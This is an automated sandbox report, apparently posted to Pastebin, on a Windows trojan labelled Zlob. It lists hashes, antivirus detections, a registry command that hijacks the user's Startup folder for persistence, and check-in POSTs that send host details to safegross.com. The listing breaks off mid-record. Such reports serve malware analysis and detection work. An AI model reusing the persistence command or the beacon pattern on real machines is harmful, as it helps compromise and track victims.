SHARE
TWEET

Zlob Malware JSON Report

paladin316 Jun 18th, 2019 115 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. [*] MalFamily: "Zlob"
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "01"
  7. [*] File Size: 57096
  8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. [*] SHA256: "d08e515044a61b2b2dad9deda564460914a9559cdfb9772babf04039d3814252"
  10. [*] MD5: "8caf035dd4cf30a9904ff243c372df6e"
  11. [*] SHA1: "470bc49c9d3923c73148dd9d58395199f9743df5"
  12. [*] SHA512: "e53f36e0c8e6b4662c5a6e06a1c8c8f42bd3d0c4f3f75642ca2ab96df189132686b4142959d2f622dc8336835ed5e752f1efce26e12957a2609ad7ccc5c433a2"
  13. [*] CRC32: "13613AA0"
  14. [*] SSDEEP: "768:3P6FP6vnVPXovpOg0nBZpfW89DvGH7dc7vCy6vUg/O43ZY1KgGEJC:CFAPXfg0nzpV9rGHq7v1x4paoEA"
  15.  
  16. [*] Process Execution: [
  17.     "01.exe",
  18.     "hkmoov.exe",
  19.     "reg.exe"
  20. ]
  21.  
  22. [*] Signatures Detected: [
  23.     {
  24.         "Description": "Creates RWX memory",
  25.         "Details": []
  26.     },
  27.     {
  28.         "Description": "A process attempted to delay the analysis task.",
  29.         "Details": [
  30.             {
  31.                 "Process": "hkmoov.exe tried to sleep 1740 seconds, actually delayed analysis time by 0 seconds"
  32.             }
  33.         ]
  34.     },
  35.     {
  36.         "Description": "Reads data out of its own binary image",
  37.         "Details": [
  38.             {
  39.                 "self_read": "process: 01.exe, pid: 2704, offset: 0x00000000, length: 0x0000df08"
  40.             }
  41.         ]
  42.     },
  43.     {
  44.         "Description": "Drops a binary and executes it",
  45.         "Details": [
  46.             {
  47.                 "binary": "C:\\programdata\\d61e6e07ea\\hkmoov.exe"
  48.             }
  49.         ]
  50.     },
  51.     {
  52.         "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  53.         "Details": [
  54.             {
  55.                 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  56.             },
  57.             {
  58.                 "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  59.             },
  60.             {
  61.                 "suspicious_request": "http://safegross.com/ppk/index.php"
  62.             },
  63.             {
  64.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  65.             },
  66.             {
  67.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  68.             },
  69.             {
  70.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  71.             },
  72.             {
  73.                 "suspicious_request": "http://redirector.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe"
  74.             },
  75.             {
  76.                 "suspicious_request": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes"
  77.             }
  78.         ]
  79.     },
  80.     {
  81.         "Description": "Performs some HTTP requests",
  82.         "Details": [
  83.             {
  84.                 "url": "http://safegross.com/ppk/index.php"
  85.             },
  86.             {
  87.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  88.             },
  89.             {
  90.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  91.             },
  92.             {
  93.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  94.             },
  95.             {
  96.                 "url": "http://redirector.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe"
  97.             },
  98.             {
  99.                 "url": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes"
  100.             }
  101.         ]
  102.     },
  103.     {
  104.         "Description": "Attempts to identify installed AV products by installation directory",
  105.         "Details": [
  106.             {
  107.                 "file": "C:\\ProgramData\\AVAST Software"
  108.             },
  109.             {
  110.                 "file": "C:\\ProgramData\\Avira"
  111.             },
  112.             {
  113.                 "file": "C:\\ProgramData\\Kaspersky Lab"
  114.             },
  115.             {
  116.                 "file": "C:\\ProgramData\\ESET"
  117.             },
  118.             {
  119.                 "file": "C:\\ProgramData\\Panda Security"
  120.             },
  121.             {
  122.                 "file": "C:\\ProgramData\\Bitdefender"
  123.             },
  124.             {
  125.                 "file": "C:\\ProgramData\\AVG"
  126.             },
  127.             {
  128.                 "file": "C:\\ProgramData\\Doctor Web"
  129.             }
  130.         ]
  131.     },
  132.     {
  133.         "Description": "File has been identified by 24 Antiviruses on VirusTotal as malicious",
  134.         "Details": [
  135.             {
  136.                 "FireEye": "Generic.mg.8caf035dd4cf30a9"
  137.             },
  138.             {
  139.                 "McAfee": "Artemis!8CAF035DD4CF"
  140.             },
  141.             {
  142.                 "ESET-NOD32": "a variant of Win32/Kryptik.GUCF"
  143.             },
  144.             {
  145.                 "Paloalto": "generic.ml"
  146.             },
  147.             {
  148.                 "Kaspersky": "Trojan.Win32.Agent.xaalpa"
  149.             },
  150.             {
  151.                 "Avast": "Win32:BackdoorX-gen [Trj]"
  152.             },
  153.             {
  154.                 "Rising": "Trojan.Kryptik!8.8 (CLOUD)"
  155.             },
  156.             {
  157.                 "Sophos": "Troj/Agent-BBUR"
  158.             },
  159.             {
  160.                 "F-Secure": "Trojan.TR/AD.Zlob.wkfyf"
  161.             },
  162.             {
  163.                 "DrWeb": "Trojan.SpyBot.840"
  164.             },
  165.             {
  166.                 "Invincea": "heuristic"
  167.             },
  168.             {
  169.                 "McAfee-GW-Edition": "Artemis!Trojan"
  170.             },
  171.             {
  172.                 "Ikarus": "Backdoor.Rat.FlawedAmmyy"
  173.             },
  174.             {
  175.                 "Avira": "TR/AD.Zlob.wkfyf"
  176.             },
  177.             {
  178.                 "Microsoft": "TrojanDownloader:Win32/Zlob.ZXP!bit"
  179.             },
  180.             {
  181.                 "Endgame": "malicious (high confidence)"
  182.             },
  183.             {
  184.                 "ZoneAlarm": "Trojan.Win32.Agent.xaalpa"
  185.             },
  186.             {
  187.                 "AhnLab-V3": "Trojan/Win32.Agent.C3291732"
  188.             },
  189.             {
  190.                 "ALYac": "Backdoor.RAT.FlawedAmmyy"
  191.             },
  192.             {
  193.                 "Tencent": "Win32.Trojan.Raasmx.Auto"
  194.             },
  195.             {
  196.                 "SentinelOne": "DFI - Suspicious PE"
  197.             },
  198.             {
  199.                 "Fortinet": "W32/GenKryptik.DKZJ!tr"
  200.             },
  201.             {
  202.                 "AVG": "Win32:BackdoorX-gen [Trj]"
  203.             },
  204.             {
  205.                 "CrowdStrike": "win/malicious_confidence_70% (W)"
  206.             }
  207.         ]
  208.     },
  209.     {
  210.         "Description": "Creates a copy of itself",
  211.         "Details": [
  212.             {
  213.                 "copy": "C:\\programdata\\d61e6e07ea\\hkmoov.exe"
  214.             }
  215.         ]
  216.     }
  217. ]
  218.  
  219. [*] Started Service: []
  220.  
  221. [*] Executed Commands: [
  222.     "c:\\programdata\\d61e6e07ea\\hkmoov.exe",
  223.     "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\d61e6e07ea"
  224. ]
  225.  
  226. [*] Mutexes: []
  227.  
  228. [*] Modified Files: [
  229.     "C:\\ProgramData\\0",
  230.     "C:\\programdata\\d61e6e07ea\\hkmoov.exe",
  231.     "C:\\programdata\\d61e6e07ea\\hkmoov.exe:Zone.Identifier"
  232. ]
  233.  
  234. [*] Deleted Files: []
  235.  
  236. [*] Modified Registry Keys: [
  237.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup"
  238. ]
  239.  
  240. [*] Deleted Registry Keys: []
  241.  
  242. [*] DNS Communications: [
  243.     {
  244.         "type": "A",
  245.         "request": "safegross.com",
  246.         "answers": [
  247.             {
  248.                 "data": "151.237.80.80",
  249.                 "type": "A"
  250.             },
  251.             {
  252.                 "data": "89.238.207.5",
  253.                 "type": "A"
  254.             },
  255.             {
  256.                 "data": "93.103.166.70",
  257.                 "type": "A"
  258.             },
  259.             {
  260.                 "data": "37.152.176.90",
  261.                 "type": "A"
  262.             },
  263.             {
  264.                 "data": "91.104.177.151",
  265.                 "type": "A"
  266.             },
  267.             {
  268.                 "data": "89.190.74.198",
  269.                 "type": "A"
  270.             },
  271.             {
  272.                 "data": "2.185.146.116",
  273.                 "type": "A"
  274.             },
  275.             {
  276.                 "data": "5.253.53.236",
  277.                 "type": "A"
  278.             },
  279.             {
  280.                 "data": "95.158.162.200",
  281.                 "type": "A"
  282.             },
  283.             {
  284.                 "data": "197.255.225.249",
  285.                 "type": "A"
  286.             },
  287.             {
  288.                 "data": "89.45.19.26",
  289.                 "type": "A"
  290.             },
  291.             {
  292.                 "data": "186.87.135.97",
  293.                 "type": "A"
  294.             },
  295.             {
  296.                 "data": "193.33.1.18",
  297.                 "type": "A"
  298.             },
  299.             {
  300.                 "data": "31.5.167.149",
  301.                 "type": "A"
  302.             },
  303.             {
  304.                 "data": "41.110.200.194",
  305.                 "type": "A"
  306.             },
  307.             {
  308.                 "data": "85.187.48.16",
  309.                 "type": "A"
  310.             },
  311.             {
  312.                 "data": "181.59.254.21",
  313.                 "type": "A"
  314.             },
  315.             {
  316.                 "data": "89.45.19.24",
  317.                 "type": "A"
  318.             },
  319.             {
  320.                 "data": "86.101.230.109",
  321.                 "type": "A"
  322.             }
  323.         ]
  324.     }
  325. ]
  326.  
  327. [*] Domains: [
  328.     {
  329.         "ip": "",
  330.         "domain": "safegross.com"
  331.     }
  332. ]
  333.  
  334. [*] Network Communication - ICMP: []
  335.  
  336. [*] Network Communication - HTTP: [
  337.     {
  338.         "count": 29,
  339.         "body": "id=2818818937&sd=34d082&vs=1.30&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
  340.         "uri": "http://safegross.com/ppk/index.php",
  341.         "user-agent": "",
  342.         "method": "POST",
  343.         "host": "safegross.com",
  344.         "version": "1.1",
  345.         "path": "/ppk/index.php",
  346.         "data": "POST /ppk/index.php HTTP/1.1\r\nHost: safegross.com\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 76\r\n\r\nid=2818818937&sd=34d082&vs=1.30&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
  347.         "port": 80
  348.     },
  349.     {
  350.         "count": 1,
  351.         "body": "",
  352.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
  353.         "user-agent": "Microsoft-CryptoAPI/6.1",
  354.         "method": "GET",
  355.         "host": "ocsp.digicert.com",
  356.         "version": "1.1",
  357.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
  358.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 150849\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 10:50:30 GMT\r\nIf-None-Match: \"5ced1276-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  359.         "port": 80
  360.     },
  361.     {
  362.         "count": 1,
  363.         "body": "",
  364.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
  365.         "user-agent": "Microsoft-CryptoAPI/6.1",
  366.         "method": "GET",
  367.         "host": "ocsp.digicert.com",
  368.         "version": "1.1",
  369.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
  370.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nCache-Control: max-age = 135176\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 05:30:18 GMT\r\nIf-None-Match: \"5cecc76a-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  371.         "port": 80
  372.     },
  373.     {
  374.         "count": 1,
  375.         "body": "",
  376.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
  377.         "user-agent": "Microsoft-CryptoAPI/6.1",
  378.         "method": "GET",
  379.         "host": "ocsp.digicert.com",
  380.         "version": "1.1",
  381.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
  382.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 168744\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 15:00:08 GMT\r\nIf-None-Match: \"5ced4cf8-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  383.         "port": 80
  384.     },
  385.     {
  386.         "count": 1,
  387.         "body": "",
  388.         "uri": "http://redirector.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe",
  389.         "user-agent": "Microsoft BITS/7.5",
  390.         "method": "HEAD",
  391.         "host": "redirector.gvt1.com",
  392.         "version": "1.1",
  393.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe",
  394.         "data": "HEAD /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: redirector.gvt1.com\r\n\r\n",
  395.         "port": 80
  396.     },
  397.     {
  398.         "count": 1,
  399.         "body": "",
  400.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  401.         "user-agent": "Microsoft BITS/7.5",
  402.         "method": "HEAD",
  403.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  404.         "version": "1.1",
  405.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  406.         "data": "HEAD /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  407.         "port": 80
  408.     },
  409.     {
  410.         "count": 1,
  411.         "body": "",
  412.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  413.         "user-agent": "Microsoft BITS/7.5",
  414.         "method": "GET",
  415.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  416.         "version": "1.1",
  417.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  418.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=0-6820\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  419.         "port": 80
  420.     },
  421.     {
  422.         "count": 1,
  423.         "body": "",
  424.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  425.         "user-agent": "Microsoft BITS/7.5",
  426.         "method": "GET",
  427.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  428.         "version": "1.1",
  429.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  430.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=6821-17424\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  431.         "port": 80
  432.     },
  433.     {
  434.         "count": 1,
  435.         "body": "",
  436.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  437.         "user-agent": "Microsoft BITS/7.5",
  438.         "method": "GET",
  439.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  440.         "version": "1.1",
  441.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  442.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=17425-27568\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  443.         "port": 80
  444.     },
  445.     {
  446.         "count": 1,
  447.         "body": "",
  448.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  449.         "user-agent": "Microsoft BITS/7.5",
  450.         "method": "GET",
  451.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  452.         "version": "1.1",
  453.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  454.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=27569-38149\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  455.         "port": 80
  456.     },
  457.     {
  458.         "count": 1,
  459.         "body": "",
  460.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  461.         "user-agent": "Microsoft BITS/7.5",
  462.         "method": "GET",
  463.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  464.         "version": "1.1",
  465.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  466.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=38150-60344\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  467.         "port": 80
  468.     },
  469.     {
  470.         "count": 1,
  471.         "body": "",
  472.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  473.         "user-agent": "Microsoft BITS/7.5",
  474.         "method": "GET",
  475.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  476.         "version": "1.1",
  477.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  478.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=60345-105675\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  479.         "port": 80
  480.     },
  481.     {
  482.         "count": 1,
  483.         "body": "",
  484.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  485.         "user-agent": "Microsoft BITS/7.5",
  486.         "method": "GET",
  487.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  488.         "version": "1.1",
  489.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
